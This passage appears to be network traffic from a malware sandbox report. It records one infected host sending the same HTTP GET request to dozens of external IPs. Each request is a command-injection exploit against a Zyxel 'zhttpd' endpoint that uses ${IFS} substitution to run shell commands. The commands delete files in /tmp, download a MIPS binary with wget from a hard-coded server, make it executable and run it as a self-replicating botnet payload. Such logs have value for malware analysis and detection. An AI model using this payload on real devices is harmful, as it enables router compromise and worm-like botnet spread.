                                            Jan 14, 2024 15:50:29.248609066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1560192.168.2.235572646.78.51.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248661995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1561192.168.2.2349530120.136.208.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248663902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1562192.168.2.2340020144.148.120.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248683929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1563192.168.2.235653891.153.129.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248702049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1564192.168.2.2356714104.244.230.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248744011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1565192.168.2.234881476.111.39.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248780012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1566192.168.2.2356898205.198.220.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248788118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1567192.168.2.233974083.220.236.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248812914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1568192.168.2.2342592161.149.79.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248835087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1569192.168.2.233997024.241.121.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248858929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1570192.168.2.2351178126.199.11.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248900890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1571192.168.2.235037442.100.141.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248909950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1572192.168.2.235914859.106.116.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248928070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1573192.168.2.234911257.20.156.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248965979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1574192.168.2.233420684.40.143.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248969078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1575192.168.2.234219246.18.137.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.248995066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1576192.168.2.235445665.255.208.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249037027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1577192.168.2.2357240167.158.3.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249052048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1578192.168.2.234978838.114.123.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249083042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1579192.168.2.2359846164.167.122.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249085903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1580192.168.2.2350948107.107.218.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249093056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1581192.168.2.23393468.205.234.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249110937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1582192.168.2.2358482140.145.110.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249150991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1583192.168.2.2344664101.192.224.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249165058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1584192.168.2.233756493.118.90.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249203920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1585192.168.2.2355494154.141.223.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249218941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1586192.168.2.2332960119.35.42.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249237061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1587192.168.2.235859699.160.214.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249264956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1588192.168.2.2342082188.111.175.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249294043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1589192.168.2.2360844185.48.90.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249327898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1590192.168.2.2347036124.127.92.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.249346972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1591192.168.2.2356272189.103.147.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252120018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1592192.168.2.2360846142.86.114.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252144098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1593192.168.2.2355248149.73.214.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252151012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1594192.168.2.2345094177.37.248.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252172947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1595192.168.2.23567908.40.79.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252206087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1596192.168.2.2338896222.182.53.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252254009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1597192.168.2.2339054150.30.232.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252274036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1598192.168.2.2359322103.75.249.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252309084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1599192.168.2.234535434.77.243.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252311945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1600192.168.2.2338826117.219.237.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252343893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1601192.168.2.2358408175.43.54.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252371073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1602192.168.2.233745414.77.145.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252388954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1603192.168.2.2349696126.227.28.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252418995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1604192.168.2.2349844193.167.213.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252460957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1605192.168.2.23504962.196.50.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252463102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1606192.168.2.233903466.177.76.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252494097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1607192.168.2.2358832125.86.159.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252516031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1608192.168.2.235112824.2.111.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252546072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1609192.168.2.2342620129.131.91.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252546072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1610192.168.2.235828291.121.201.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252562046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1611192.168.2.2353932115.156.23.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252600908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1612192.168.2.2354518120.209.102.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.252633095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1613192.168.2.236087234.137.201.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.258888006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1614192.168.2.235531488.209.107.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.258915901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1615192.168.2.2358706190.234.125.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.258925915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1616192.168.2.2337362130.198.232.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.258941889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1617192.168.2.235672282.218.61.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.258969069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1618192.168.2.2341650198.133.247.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.258989096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1619192.168.2.2342032135.59.130.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259037018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1620192.168.2.234260665.219.238.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259063959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1621192.168.2.23452741.114.151.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259104013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1622192.168.2.2343954206.169.197.11443
                                            TimestampBytes transferredDirectionData
